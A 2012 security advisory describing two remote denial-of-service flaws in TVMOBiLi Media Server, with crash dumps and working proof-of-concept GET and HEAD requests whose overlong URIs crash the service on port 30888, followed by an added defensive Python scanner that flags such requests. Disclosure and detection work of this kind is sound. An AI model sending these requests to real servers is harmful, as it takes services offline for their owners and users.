High-Tech Bridge Security Advisory HTB23120
Published: Oct 15, 2012

TVMOBiLi Media Server Multiple Remote DoS Vulnerabilities

High-Tech Bridge
www.htbridge.com

EPSS: 0.725 (percentile 98.1%)

High-Tech Bridge Security Research Lab has discovered two remote denial-of-service (DoS) vulnerabilities in TVMOBiLi Media Server, which could be exploited to crash the remote server with malicious HTTP requests.

1. Improper Handling of Length Parameter Inconsistency in TVMOBiLi: CVE-2012-5451

1.1 The vulnerability exists due to improper handling of URI length within the “HttpUtils.dll” dynamic-link library. A remote attacker can send a specially crafted HTTP GET request of 161, 257 or 255 characters long to TCP port 30888 (TVMOBiLi’s default server port) and cause a stack-based buffer overrun that crashes the tvMobiliService service.
Crash details
MSVCR100.dll:78abe2ad mov [edx], al from thread 1860 caused access violation when attempting to write to 0x0170e000
CONTEXT DUMP
EIP: 78abe2ad mov [edx],al
EAX: 00b8fd3e ( 12123454) -> injected stream (stack)
EBX: 00000019 ( 25) -> N/A
ECX: 00b8f8d0 ( 12122320) -> ppB;p$= @==ypp N/A
EDI: 00b8f8d0 ( 12122320) -> ppB;p$= @==ypp sx xx’(x(x0kxxT$|$| (stack)
EBP: 00b8f61c ( 12121628) -> sx xx’(x(x0kxxT$|$| (stack)
ESP: 00b8f60c ( 12121612) -> xnx|8xx|8xp+| ==sx xx’ (stack)
+00: 78abe2ff (2024530687) -> N/A
+04: 00000000 ( 0) -> N/A
+08: 0000011f ( 287) -> N/A
+0c: 00000002 ( 2) -> N/A
+10: 00b8f8ac ( 12122284) -> Aax$=pppB;p$= @==ypp N/A
disasm around:
0x78abe28e jnc 0x78abe2f9
0x78abe290 outsb
0x78abe292 and fs:[eax],al
0x78abe296 test byte [ecx+0xc],0x40

Proof of Concept
The following HTTP GET request will crash a vulnerable tvMobiliService service remotely:
GET /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1
HOST: 192.168.10.12:30888
Referer: 192.168.10.12:30888
ACCEPT: /
Accept-Encoding: None
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Connection: Close
Accept-Transfer-Encoding: None

1.2 The vulnerability exists due to improper handling of URI length within the “HttpUtils.dll” dynamic-link library. A remote attacker can send a specially crafted HTTP HEAD request of 255, 257 or 260 characters long to TCP port 30888 and cause a stack-based buffer overrun that crashes the tvMobiliService service.
Crash details
MSVCR100.dll:78abe2ad mov [edx], al from thread 1745 caused access violation when attempting to write to 0x0170e000
CONTEXT DUMP
EIP: 78abe2ad mov [edx],al
EAX: 00b8fd3e ( 12123454) -> injected stream (stack)
EBX: 00000019 ( 25) -> N/A
ECX: 00b8f8d0 ( 12122320) -> ppB;p$= @==ypp N/A
EDI: 00b8f8d0 ( 12122320) -> ppB;p$= @==ypp sx xx’(x(x0kxxT$|$| (stack)
EBP: 00b8f61c ( 12121628) -> sx xx’(x(x0kxxT$|$| (stack)
ESP: 00b8f60c ( 12121612) -> xnx|8xx|8xp+| ==sx xx’ (stack)
+00: 78abe2ff (2024530687) -> N/A
+04: 00000000 ( 0) -> N/A
+08: 0000011f ( 287) -> N/A
+0c: 00000002 ( 2) -> N/A
+10: 00b8f8ac ( 12122284) -> Aax$=pppB;p$= @==ypp N/A
disasm around:
0x78abe28e jnc 0x78abe2f9
0x78abe290 outsb
0x78abe292 and fs:[eax],al
0x78abe296 test byte [ecx+0xc],0x40

Proof of Concept
The following HTTP HEAD request will crash a vulnerable tvMobiliService service remotely:
HEAD /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1
HOST: 192.168.10.12:30888
Referer: 192.168.10.12:30888
ACCEPT: /
Accept-Encoding: None
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Connection: Close
Accept-Transfer-Encoding: None
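Both crash conditions (1.1 and 1.2) are triggered by nothing more than the length of the request-URI, which makes them easy to screen for in front of the service or in captured traffic. The following Python is an added example, not High-Tech Bridge's code and not part of the advisory: it parses raw HTTP requests, treats the advisory's lengths as request-URI lengths (an assumption; the advisory itself only says "request of N characters long"), and reports requests that either hit one of those exact lengths against port 30888 or exceed a generic ceiling. The ceiling value MAX_URI_LEN, the helper names, and every sample request are constructed for this example.

```python
"""Request-URI length check for the HTB23120 / CVE-2012-5451 crash conditions.

Added example, not from the advisory: it reads the lengths the advisory gives
(GET: 161, 257, 255; HEAD: 255, 257, 260) as request-URI lengths (an
assumption) and flags requests that match them, or that exceed a generic
ceiling, so a reverse proxy or log review can spot them before they reach
tvMobiliService.  All sample requests below are constructed.
"""
import re
from typing import Dict, List, Optional

TVMOBILI_PORT = 30888  # default server port named in the advisory

# Request-URI lengths the advisory reports as crashing the service, per method.
CRASH_LENGTHS: Dict[str, set] = {
    "GET": {161, 255, 257},
    "HEAD": {255, 257, 260},
}

# Generic ceiling for a front-end filter.  Assumed value, not from the advisory;
# the point is that a fixed cap removes the whole class, not just listed sizes.
MAX_URI_LEN = 128

_REQUEST_LINE = re.compile(r"^([A-Z]+) (\S+) HTTP/\d\.\d$")
_HOST_PORT = re.compile(r":(\d+)$")


def parse_request(raw: str) -> Optional[Dict[str, object]]:
    """Return method, request-URI length and Host port of a raw HTTP request,
    or None when the request line is malformed."""
    lines = raw.replace("\r\n", "\n").split("\n")
    match = _REQUEST_LINE.match(lines[0])
    if not match:
        return None
    method, uri = match.group(1), match.group(2)
    port: Optional[int] = None
    for line in lines[1:]:
        if line == "":
            break  # blank line ends the header block
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "host":
            port_match = _HOST_PORT.search(value.strip())
            port = int(port_match.group(1)) if port_match else 80
            break
    return {"method": method, "uri_len": len(uri), "port": port}


def classify(raw: str) -> str:
    """Verdict for one request: 'unparsable', 'known-crash-length',
    'over-limit' or 'ok'."""
    info = parse_request(raw)
    if info is None:
        return "unparsable"
    method = info["method"]
    uri_len = info["uri_len"]
    if info["port"] == TVMOBILI_PORT and uri_len in CRASH_LENGTHS.get(method, set()):
        return "known-crash-length"
    if uri_len > MAX_URI_LEN:
        return "over-limit"
    return "ok"


def scan(requests: List[str]) -> List[Dict[str, object]]:
    """Classify a batch of raw requests; returns only the non-'ok' findings."""
    findings = []
    for index, raw in enumerate(requests):
        verdict = classify(raw)
        if verdict != "ok":
            info = parse_request(raw) or {}
            findings.append({"index": index, "verdict": verdict,
                             "method": info.get("method"),
                             "uri_len": info.get("uri_len")})
    return findings


def _request(method: str, uri: str, host: str) -> str:
    """Build a constructed raw request in the shape the advisory's PoC uses."""
    return (f"{method} {uri} HTTP/1.1\r\nHost: {host}\r\n"
            "Connection: Close\r\n\r\n")


# Constructed samples: one benign request, the two crash-length shapes from the
# advisory, and an oversized URI aimed at a different port.
SAMPLE_REQUESTS = [
    _request("GET", "/description.xml", "192.168.10.12:30888"),
    _request("GET", "/" + "A" * 256, "192.168.10.12:30888"),   # URI length 257
    _request("HEAD", "/" + "A" * 259, "192.168.10.12:30888"),  # URI length 260
    _request("GET", "/" + "A" * 299, "192.168.10.12:8080"),    # URI length 300
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_REQUESTS):
        print(finding)
```

The exact-length match is useful for confirming that logged traffic matches this advisory; for blocking, the length ceiling is the meaningful control, since a stack buffer that overruns at 255 characters will not be safe at lengths the advisory did not happen to list.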